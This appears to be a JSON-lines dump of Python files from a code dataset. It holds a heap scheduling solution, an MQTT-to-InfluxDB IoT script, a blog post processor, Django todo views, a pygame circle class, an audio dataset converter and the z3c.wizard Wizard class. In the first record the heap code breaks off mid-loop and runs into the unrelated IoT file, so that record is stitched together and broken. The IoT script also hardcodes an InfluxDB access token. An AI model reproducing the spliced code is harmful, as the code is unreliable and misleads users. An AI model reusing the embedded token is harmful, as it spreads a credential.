+{"seq_id": "38556351800", "text": "import heapq\ndef solution(jobs):\n answer = 0\n start = -1 # 특정 작업의 시작 시간\n time = 0 # 전체 소요 시간\n heapq.heapify(jobs)\n heap = []\n cnt = 0\n while cnt *\r\n#* *\r\n#*Esse arquivo faz parte de um projeto da disciplina Internet das Coisas, ministrada pela*\r\n#*professora Flávia Delicato *\r\n#* *\r\n#*O arquivo se inscreve nos tópicos, e envia-los para o InfluxDB *\r\n#*****************************************************************************************\r\nfrom fastapi import FastAPI\r\nfrom paho import mqtt\r\nfrom fastapi_mqtt import FastMQTT, MQTTConfig\r\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\r\nfrom influxdb_client.client.write_api import SYNCHRONOUS\r\nimport datetime\r\n\r\nmqtt_broker = 'broker.mqttdashboard.com'\r\nmqtt_port = 1883\r\nmqtt_topic = \"casa/comodos1\"\r\nmqtt_topic2= \"casa/temperatura1\"\r\nfilenamet=\"temperatura.txt\"\r\nfilenamec=\"comodo.txt\"\r\n\r\napp = FastAPI()\r\n\r\nmqtt_config = MQTTConfig(host = mqtt_broker,port = mqtt_port,keepalive = 60)\r\n\r\nmqtt = FastMQTT(config=mqtt_config)\r\n\r\nmqtt.init_app(app)\r\n\r\ntoken = \"1MI7_9MBv6pDLHJKv9NDhmNFMCfaOK3s-6HFgCwRXyT2LM2d29Rtcq9QN0dV2oH-IbEmCh7mMzpvWqR7jSPedg==\"\r\norg = \"UFF-Internet das Coisas\"\r\nbucket = \"trabalho\"\r\n\r\nclient = InfluxDBClient(url=\"http://localhost:8086\", token=token)\r\n\r\nwrite_api = client.write_api(write_options=SYNCHRONOUS)\r\n\r\n@mqtt.on_connect()\r\ndef connect(client, flags, rc, properties):\r\n mqtt.client.subscribe(mqtt_topic) #subscribing mqtt topic\r\n mqtt.client.subscribe(mqtt_topic2)\r\n print(\"Connected: \", client, flags, rc, properties)\r\n\r\n@mqtt.on_message()\r\nasync def message(client, topic, payload, qos, properties):\r\n print(\"Received message: \",topic, payload.decode(), qos, properties)\r\n\r\n \r\n\r\n@mqtt.on_disconnect()\r\ndef disconnect(client, packet, exc=None):\r\n print(\"Disconnected\")\r\n\r\n@mqtt.on_subscribe()\r\ndef subscribe(client, mid, qos, properties):\r\n print(\"subscribed\", client, mid, qos, properties)\r\n \r\n@mqtt.subscribe(mqtt_topic) \r\nasync def get_dado(client,topic, payload, qos, properties): #recebe o tópico cômodos\r\n print(\"data: \", topic, payload.decode(), qos, properties)\r\n s=payload.decode()\r\n x=s.split(\" \")\r\n data = \"casa,comodo=\"+ x[2]+\" valor=1\" #converte para o protocolo em linha\r\n write_api.write(bucket, org, data) #envia para o InfluxDB\r\n\r\n@mqtt.subscribe(mqtt_topic2)\r\nasync def get_temperatura(client,topic,payload,qos,properties):\r\n print(\"data: \", topic, payload.decode(), qos, properties)\r\n s=payload.decode()\r\n x=s.split(\" \")\r\n data = \"casa,temperatura=\"+ x[2]+\" valor=\"+x[3] #converte para o protocolo em linha\r\n write_api.write(bucket, org, data) #envia para o InfluxDB\r\n\r\n\r\n@app.get(\"/teste\")\r\nasync def teste():\r\n return {\"data\"}\r\n \r\n \r\n ", "repo_name": "brenda-gouveia/IoT_project", "sub_path": "interface.py", "file_name": "interface.py", "file_ext": "py", "file_size_in_byte": 3206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "fastapi.FastAPI", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi_mqtt.MQTTConfig", "line_number": 27, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi_mqtt.FastMQTT", "line_number": 29, "usage_type": "call"}, {"api_name": "paho.mqtt.init_app", "line_number": 31, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 31, "usage_type": "name"}, {"api_name": "influxdb_client.InfluxDBClient", "line_number": 37, "usage_type": "call"}, {"api_name": "influxdb_client.client.write_api.SYNCHRONOUS", "line_number": 39, "usage_type": "name"}, {"api_name": "paho.mqtt.client.subscribe", "line_number": 43, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 43, "usage_type": "attribute"}, {"api_name": "paho.mqtt", "line_number": 43, "usage_type": "name"}, {"api_name": "paho.mqtt.client.subscribe", "line_number": 44, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 44, "usage_type": "attribute"}, {"api_name": "paho.mqtt", "line_number": 44, "usage_type": "name"}, {"api_name": "paho.mqtt.on_connect", "line_number": 41, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 41, "usage_type": "name"}, {"api_name": "paho.mqtt.on_message", "line_number": 47, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 47, "usage_type": "name"}, {"api_name": "paho.mqtt.on_disconnect", "line_number": 53, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 53, "usage_type": "name"}, {"api_name": "paho.mqtt.on_subscribe", "line_number": 57, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 57, "usage_type": "name"}, {"api_name": "paho.mqtt.subscribe", "line_number": 61, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 61, "usage_type": "name"}, {"api_name": "paho.mqtt.subscribe", "line_number": 69, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 69, "usage_type": "name"}]}
+{"seq_id": "73502896408", "text": "import os\nimport codecs\nimport datetime\nimport fileutils\n\nclass ProcFiles(object):\n def __init__(self, args_dict):\n self.posts_dir = args_dict[\"posts_dir\"]\n self.output_dir = args_dict[\"output_dir\"]\n\n def process(self):\n \"\"\"Given a directory of posts, return a dict representing those posts\n and a dict representing the blog's config.\n Return: (post_list, config_dict)\n \"\"\"\n self.posts_dir = fileutils.add_slash_if_missing(self.posts_dir)\n post_list = []\n for post_filename in os.listdir(self.posts_dir):\n # Process config file\n if post_filename == \"_config\":\n config_dict = self._get_config_info(self.posts_dir+post_filename)\n continue\n # Process LaMark files\n if not post_filename.endswith(\".lm\"):\n continue\n post_info = self._get_post_info(self.posts_dir + post_filename)\n post_list.append(post_info)\n post_list.sort(key=lambda post_info: post_info['date'], reverse=True)\n post_list.append({\n 'type': 'toc',\n 'permalink': 'index.html',\n 'regen': True,\n })\n return (post_list, config_dict)\n\n def _get_post_info(self,post_filename):\n \"\"\"Given the filename of a post, populate a dict representing that post.\n \"\"\"\n post_info = {\n \"title\": None, # Post title\n \"author\": None, # Post author\n \"date\": None, # Date of post\n \"type\": None, # Type: page, post, rss, toc\n \"permalink\": None, # Permanent title of the post \"my-post.html\"\n \"desc\": None, # Post description\n \"body\": None, # Body of the post in LaMark\n \"html_body\": None,\n }\n # Use utf-8, otherwise the markdown module chokes on it.\n with codecs.open(post_filename, encoding='utf-8') as post_file:\n whitespace_count=0\n while True:\n line = post_file.next().strip()\n if line == \"\":\n break\n # Front matter can be surrounded by html comment tags if\n # needed.\n if line == \"\":\n continue\n colon_pos = line.find(\":\")\n if colon_pos == -1:\n raise Exception(\"Invalid front matter line: '%s'\" % line)\n arg_name = line[:colon_pos]\n if arg_name not in post_info.keys():\n raise Exception(\"Unrecognized front matter argument: '%s'\" %\n arg_name)\n post_info[arg_name] = line[colon_pos+1:].strip()\n # Body of post is the rest of the file.\n body = \"\"\n while True:\n try:\n body += post_file.next()\n except StopIteration:\n break\n post_info[\"body\"] = body.strip()\n post_info[\"html_body\"] = body.strip()\n # Convert date string to datetime obj.\n post_info[\"date\"] = datetime.datetime.strptime(\n post_info[\"date\"],\n \"%m-%d-%Y\")\n # Post must end in .html\n post_info[\"permalink\"] += \".html\"\n # Check if the file needs to be regenerated. If the output dir has\n # a file that's the same name as 'permalink', and that file is\n # more recently modified than the '.lm' file, then set regen to\n # False. Else True.\n post_stat = os.stat(post_filename)\n try:\n output_stat = os.stat(self.output_dir + post_info[\"permalink\"])\n if post_stat.st_mtime > output_stat.st_mtime:\n post_info[\"regen\"] = True\n else:\n post_info[\"regen\"] = False\n except OSError:\n # File could not be 'stat'd, so file probably doesn't exist yet,\n # meaning it needs to be generated.\n post_info[\"regen\"] = True\n self._validate_post(post_info)\n return post_info\n\n def _validate_post(self, post):\n optionals = [\"desc\"]\n for key in post:\n if key in optionals:\n continue\n if post[key] is None:\n raise Exception(\"Post '%s' is missing front matter '%s'\" %\n (post['title'], key))\n\n def _get_config_info(self,config_filename):\n config_info={\n 'home_url': None,\n 'blog_base_url': None,\n 'blog_title': None,\n 'desc': None,\n }\n with codecs.open(config_filename, encoding='utf-8') as config_file:\n for line in config_file:\n line = line.strip()\n # Skip empty lines or comments (lines beginning with #)\n if len(line) == 0 or line[0] == \"#\":\n continue\n # Colon separates argument name from argument value.\n colon_pos = line.find(\":\")\n if colon_pos == -1:\n continue\n arg_name = line[:colon_pos].strip()\n arg_val = line[colon_pos+1:].strip()\n config_info[arg_name] = arg_val\n required_args = [\n \"blog_base_url\",\n \"blog_title\",\n \"desc\",\n ]\n for arg_name in required_args:\n if config_info.get(arg_name, None) is None:\n raise Exception(\"Config file missing argument: '%s'\" % arg_name)\n return config_info\n", "repo_name": "beala/paleoblogger", "sub_path": "procfiles.py", "file_name": "procfiles.py", "file_ext": "py", "file_size_in_byte": 5728, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "fileutils.add_slash_if_missing", "line_number": 16, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 87, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 89, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "16169517959", "text": "from django.shortcuts import redirect, render \nfrom django.http import HttpResponse, JsonResponse \nfrom todo_app.models import Todo\n\nconvert_into_boolean = {\n \"0\": False,\n \"1\": True,\n}\norder_to_string = {\n \"0\": \"created_at\",\n \"1\": \"-created_at\"\n}\n\n\n\ndef index(request):\n search = request.GET.get(\"todoSearch\")\n completed = request.GET.get(\"completed\")\n order = request.GET.get(\"order\")\n all_todos = Todo.objects.all() \n if search != None: \n all_todos = all_todos.filter(title__icontains = search)\n if completed != None:\n value = convert_into_boolean.get(completed)\n all_todos = Todo.objects.filter(completed=value)\n if order != None:\n value = order_to_string.get(order)\n all_todos = all_todos.order_by(value)\n \n data = {\n \"todo\": all_todos\n }\n return render(request, \"index.html\", context=data)\n\ndef add_view(request):\n if request.method == \"GET\":\n return HttpResponse(\"Invalid Method\")\n else:\n todo_input = request.POST['todoInput']\n print(\"todo_input:\", todo_input)\n Todo.objects.create(title=todo_input)\n return redirect('todo_index')\n\ndef detailed_view(request, todo_id):\n if request.method == \"POST\":\n return HttpResponse(\"Invalid Method\")\n else:\n try:\n todo_object = Todo.objects.get(id=todo_id)\n print(todo_object)\n data = {\n 'id': todo_object.id,\n 'title': todo_object.title,\n 'completed': todo_object.completed,\n 'created_at': todo_object.created_at,\n 'updated_at': todo_object.updated_at,\n }\n return JsonResponse(data)\n except Todo.DoesNotExist:\n return HttpResponse(\"Error Todo not found\")\ndef delete_todo(request, todo_id):\n if request.method == \"GET\":\n return HttpResponse(\"Invalid Method\")\n else:\n try:\n todo_object = Todo.objects.get(id=todo_id)\n todo_object.delete()\n return redirect('todo_index')\n except Todo.DoesNotExist:\n return HttpResponse(\"Error Todo not found\")\n \ndef mark_view(request, todo_id):\n if request.method == \"GET\":\n return HttpResponse(\"Invalid Method\")\n else:\n try:\n todo_object = Todo.objects.get(id=todo_id)\n todo_object.completed = True \n todo_object.save()\n return redirect('todo_index')\n except Todo.DoesNotExist:\n return HttpResponse(\"Error Todo not found\")", "repo_name": "Venugopalreddygithub/django-batch3", "sub_path": "todo_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "todo_app.models.Todo.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 20, "usage_type": "name"}, {"api_name": "todo_app.models.Todo.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 25, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.create", "line_number": 41, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 41, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.get", "line_number": 49, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 49, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 58, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.DoesNotExist", "line_number": 59, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 59, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 63, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.get", "line_number": 66, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.DoesNotExist", "line_number": 69, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.get", "line_number": 77, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 77, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.DoesNotExist", "line_number": 81, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 81, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "1551829395", "text": "import pygame\nfrom pygame.surface import Surface, SurfaceType\nfrom typing import Union\n\n\nclass Circle:\n \"\"\"\n This class represents the circle which appears during the game.\n \"\"\"\n def __init__(self, radius, position, color):\n self.radius = radius\n self.position = position\n self.color = color\n self.rect_obj = pygame.Rect(position[0] - radius, position[1] - radius,\n 2 * radius, 2 * radius)\n\n def draw(self, window: Union[Surface, SurfaceType]):\n \"\"\"\n This circle will be drawn into the window.\n\n :param window: The main window of the game.\n :return:\n \"\"\"\n pygame.draw.circle(window, self.color, self.position, self.radius)\n\n def update_rect_position(self):\n \"\"\"\n The rectangular object's position that wraps the circle will be\n adjusted accordingly.\n :return:\n \"\"\"\n self.rect_obj.x = self.position[0] - self.radius\n self.rect_obj.y = self.position[1] - self.radius\n", "repo_name": "RaduTheMan/bubble_buster", "sub_path": "states/game_in_progress/circle.py", "file_name": "circle.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pygame.Rect", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "pygame.surface.Surface", "line_number": 17, "usage_type": "name"}, {"api_name": "pygame.surface.SurfaceType", "line_number": 17, "usage_type": "name"}, {"api_name": "pygame.draw.circle", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 24, "usage_type": "attribute"}]}
+{"seq_id": "9004243141", "text": "import os\nimport numpy as np\nfrom scipy.io import wavfile\n\n# Path to the LibriMix folder and selected subfolder\nwsj0_path = '/isip/Students-ro/SpeechSeparation/wsj0-mix'\npublic_path = '/isip/Public/spruenken/wsj0-2mix_normed/'\nsubfolder = ['mix', 's1', 's2']\n\n\ndef bundle_wav_files(dataset, cutout_size=1, wsj0_mix='wsj0-2mix', sampling_rate=8000, sampling_length='min'):\n \"\"\" Convert the .wav-files of a given data set into an 2D-array (.npy-file)\n :param dataset: 'cv', 'tr', 'tt'\n :param cutout_size: length of cutout in seconds\n :param wsj0_mix: 'wsj0-2mix', 'wsj0-3mix' (static für 2mix)\n :param sampling_rate: '8000', '16000'\n :param sampling_length: 'min', 'max'\n \"\"\"\n # Paths\n\n\n # Calculate cutout size and select wav_type-variable\n cutout = sampling_rate * cutout_size\n wav_type = \"wav{}k\".format(sampling_rate // 1000)\n wsj0_mix = \"2speakers\" # Static due to the given folder structure\n\n # Path to the subfolder containing the different types of data for the network\n folder_path = os.path.join(wsj0_path, wsj0_mix, wav_type, sampling_length, dataset)\n\n for subdir in subfolder:\n npy_array = []\n # Subfolder with type of sounds\n subdir_path = os.path.join(folder_path, subdir)\n for file in sorted(os.listdir(subdir_path)):\n # Path including .wav attachment\n file_path = os.path.join(subdir_path, file)\n # Read time series and scale to float32 Wertebereich\n time_series = wavfile.read(file_path)[1]\n time_series = time_series.astype(np.float32) / np.iinfo(np.int16).max\n # Split time series into one seconds sub-arrays\n n = len(time_series)\n for i in range(0, n-(n % cutout), cutout):\n sub_array = []\n sub_array = time_series[i:i+cutout]\n npy_array.append(sub_array)\n # Save the numpy array under the corresponding path\n arr = np.array(npy_array)\n # Adapt the storage path to that of LibriMix\n dataset_correlation = {'cv': 'dev', 'tr': 'train', 'tt': 'test'}\n mix_correlation = {'mix': 'mix_clean', 's1': 's1', 's2': 's2'}\n save_path = os.path.join(public_path, wav_type, sampling_length, dataset_correlation[dataset], mix_correlation[subdir])\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n save_name = 'wsj0-2mix_as_array'\n np.save(os.path.join(save_path, save_name + '.npy'), arr)\n np.savez_compressed(os.path.join(save_path, save_name + '.npz'), arr=arr, allow_pickle=True, pickle_protocol=2)\n print('Saved under: ', os.path.join(save_path, save_name + '.npy'))\n\n\nif __name__ == '__main__':\n for j in ['cv', 'tr', 'tt']: # cv := val, tr := train, tt := test\n bundle_wav_files(j)\n\n print('Datensatz für 8000 wurde erstellt')\n\n for j in ['cv', 'tr', 'tt']: # cv := val, tr := train, tt := test\n bundle_wav_files(j, sampling_rate=16000)\n", "repo_name": "moibrgit/MA23", "sub_path": "04_SepFormer_Ref/Code/datasets/wsj0-2mix/wsj0_to_npy.py", "file_name": "wsj0_to_npy.py", "file_ext": "py", "file_size_in_byte": 2981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.read", "line_number": 38, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.savez_compressed", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}]}
+{"seq_id": "1707946320", "text": "import zope.component\nimport zope.interface\nfrom z3c.form import button\nfrom z3c.formui import form\nfrom zope.publisher.interfaces import NotFound\nfrom zope.traversing.browser import absoluteURL\n\nfrom z3c.wizard import interfaces\nfrom z3c.wizard.button import WizardButtonActions\n\n\ndef nameStep(step, name):\n \"\"\"Give a step a __name__.\"\"\"\n step.__name__ = name\n return step\n\n\n@zope.interface.implementer(interfaces.IWizard)\nclass Wizard(form.Form):\n \"\"\"Wizard form.\n\n The wizard is responsible for manage the steps and offers the wizard menu\n navigation and knows the step order. The wizard can check the conditions\n given from the steps. The wizard is also responsible for delegate the\n back, next and complete actions to the steps.\n\n This IWizard object is modelled as a Controller known from the MVC\n (Model, view, controller) patter version 2.0 and the step is implemented as\n a view.\n \"\"\"\n\n buttons = button.Buttons(interfaces.IWizardButtons)\n\n # customize this part if needed\n stepInterface = interfaces.IStep\n\n firstStepAsDefault = True\n adjustStep = True\n confirmationPageName = None\n nextURL = None\n\n cssActive = 'selected'\n cssInActive = None # None will skip class attribute in DOM element\n\n # for internal use\n __name__ = None\n step = None\n\n @property\n def baseURL(self):\n return absoluteURL(self, self.request)\n\n def setUpSteps(self):\n \"\"\"Return a list of steps. This implementation uses IStep adapters.\n\n Take a look at the addStep method defined in step.py. This method\n allows you to setup steps directly in the method and offers an API for\n customized step setup.\n \"\"\"\n steps = list(zope.component.getAdapters(\n (self.context, self.request, self), self.stepInterface))\n return [nameStep(step, name) for name, step in steps]\n\n def filterSteps(self, steps):\n \"\"\"Make sure to only select available steps and we give a name.\"\"\"\n return [step for step in steps if step.available]\n\n def orderSteps(self, steps):\n # order steps by it's weight\n return sorted(steps, key=lambda step: step.weight)\n\n @property\n def steps(self):\n steps = self.setUpSteps()\n steps = self.filterSteps(steps)\n return self.orderSteps(steps)\n\n @property\n def completed(self):\n for step in self.steps:\n if not step.completed:\n return False\n return True\n\n @property\n def isFirstStep(self):\n \"\"\"See interfaces.IWizard\"\"\"\n return self.step and self.step.__name__ == self.steps[0].__name__\n\n @property\n def isLastStep(self):\n \"\"\"See interfaces.IWizard\"\"\"\n return self.step and self.step.__name__ == self.steps[-1].__name__\n\n @property\n def showBackButton(self):\n \"\"\"Ask the step.\"\"\"\n return self.step and self.step.showBackButton\n\n @property\n def showNextButton(self):\n \"\"\"Ask the step.\"\"\"\n return self.step and self.step.showNextButton\n\n @property\n def showCompleteButton(self):\n \"\"\"Ask the step.\"\"\"\n return self.step.showCompleteButton\n\n @property\n def previousStepName(self):\n if self.step is None:\n return\n stepNames = [step.__name__ for step in self.steps]\n idx = stepNames.index(self.step.__name__)\n if idx == 0:\n return\n return stepNames[idx - 1]\n\n @property\n def nextStepName(self):\n if self.step is None:\n return\n stepNames = [step.__name__ for step in self.steps]\n idx = stepNames.index(self.step.__name__)\n if idx == len(stepNames) - 1:\n return\n return stepNames[idx + 1]\n\n @property\n def stepMenu(self):\n items = []\n append = items.append\n lenght = len(self.steps) - 1\n for idx, step in enumerate(self.steps):\n firstStep = False\n lastStep = False\n if step.visible:\n isSelected = self.step and self.step.__name__ == step.__name__\n cssClass = isSelected and self.cssActive or self.cssInActive\n if idx == 0:\n firstStep = True\n if idx == lenght:\n lastStep = True\n append({\n 'name': step.__name__,\n 'title': step.label,\n 'number': str(idx + 1),\n 'url': '{}/{}'.format(self.baseURL, step.__name__),\n 'selected': self.step.__name__ == step.__name__,\n 'class': cssClass,\n 'first': firstStep,\n 'last': lastStep\n })\n return items\n\n def getDefaultStep(self):\n \"\"\"Can return the first or first not completed step as default.\"\"\"\n # return first step if this option is set\n if self.firstStepAsDefault:\n return self.steps[0]\n # return first not completed step\n for step in self.steps:\n if not step.completed:\n return step\n # fallback to first step if all steps completed\n return self.steps[0]\n\n def doAdjustStep(self):\n # Make sure all previous steps got completed. If not, redirect to the\n # last incomplete step\n if not self.adjustStep:\n return False\n for step in self.steps:\n if step.__name__ is self.step.__name__:\n break\n if not step.completed:\n # prepare redirect to not completed step and return True\n self.nextURL = '{}/{}'.format(self.baseURL, step.__name__)\n return True\n # or return False\n return False\n\n def updateActions(self):\n self.actions = WizardButtonActions(self, self.request, self.context)\n self.actions.update()\n\n def update(self):\n if self.doAdjustStep():\n return\n self.updateActions()\n\n def publishTraverse(self, request, name):\n \"\"\"Traverse to step by it's name.\"\"\"\n # Remove HTML ending\n if '.' in name:\n rawName = name.rsplit('.', 1)[0]\n else:\n rawName = name\n # Find the active step\n for step in self.steps:\n if step.__name__ == rawName:\n self.step = step\n return self.step\n raise NotFound(self, name, request)\n\n def browserDefault(self, request):\n \"\"\"The default step is our browserDefault traversal setp.\"\"\"\n if self.step is None:\n step = self.getDefaultStep()\n # always return default step as default view for our wizard\n return self, (step.__name__,)\n\n def goToStep(self, stepName):\n self.nextURL = '{}/{}'.format(self.baseURL, stepName)\n\n def goToBack(self):\n # redirect to next step if previous get sucessfuly processed\n self.goToStep(self.previousStepName)\n\n def goToNext(self):\n # redirect to next step if previous get sucessfuly processed\n self.goToStep(self.nextStepName)\n\n def doBack(self, action):\n if self.step.doBack(action):\n self.goToBack()\n\n def doNext(self, action):\n if self.step.doNext(action):\n self.goToNext()\n\n def doComplete(self, action):\n if self.step.doComplete(action):\n # do finsih after step get completed is completed\n self.doFinish()\n\n def doFinish(self):\n \"\"\"Force redirect after doComplete if confirmationPageName is given.\"\"\"\n if self.confirmationPageName is not None:\n self.nextURL = '{}/{}'.format(\n absoluteURL(self.context, self.request),\n self.confirmationPageName)\n\n @button.handler(interfaces.IWizardButtons['back'])\n def handleBack(self, action):\n self.doBack(action)\n\n @button.handler(interfaces.IWizardButtons['next'])\n def handleNext(self, action):\n self.doNext(action)\n\n @button.handler(interfaces.IWizardButtons['complete'])\n def handleComplete(self, action):\n self.doComplete(action)\n\n def render(self, *args, **kws):\n raise NotImplementedError('render is no supported')\n\n def __repr__(self):\n return \"<{} '{}'>\".format(self.__class__.__name__, self.__name__)\n", "repo_name": "zopefoundation/z3c.wizard", "sub_path": "src/z3c/wizard/wizard.py", "file_name": "wizard.py", "file_ext": "py", "file_size_in_byte": 8313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "z3c.formui.form.Form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "z3c.formui.form", "line_number": 19, "usage_type": "name"}, {"api_name": "z3c.form.button.Buttons", "line_number": 32, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 32, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 32, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 32, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IStep", "line_number": 35, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 35, "usage_type": "name"}, {"api_name": "zope.traversing.browser.absoluteURL", "line_number": 51, "usage_type": "call"}, {"api_name": "zope.component.component.getAdapters", "line_number": 60, "usage_type": "call"}, {"api_name": "zope.component.component", "line_number": 60, "usage_type": "attribute"}, {"api_name": "zope.component", "line_number": 60, "usage_type": "name"}, {"api_name": "z3c.wizard.button.WizardButtonActions", "line_number": 185, "usage_type": "call"}, {"api_name": "zope.publisher.interfaces.NotFound", "line_number": 205, "usage_type": "call"}, {"api_name": "zope.traversing.browser.absoluteURL", "line_number": 242, "usage_type": "call"}, {"api_name": "z3c.form.button.handler", "line_number": 245, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 245, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 245, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 245, "usage_type": "name"}, {"api_name": "z3c.form.button.handler", "line_number": 249, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 249, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 249, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 249, "usage_type": "name"}, {"api_name": "z3c.form.button.handler", "line_number": 253, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 253, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 253, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 253, "usage_type": "name"}, {"api_name": "zope.component.interface.implementer", "line_number": 18, "usage_type": "call"}, {"api_name": "zope.component.interface", "line_number": 18, "usage_type": "attribute"}, {"api_name": "zope.component", "line_number": 18, "usage_type": "name"}, {"api_name": 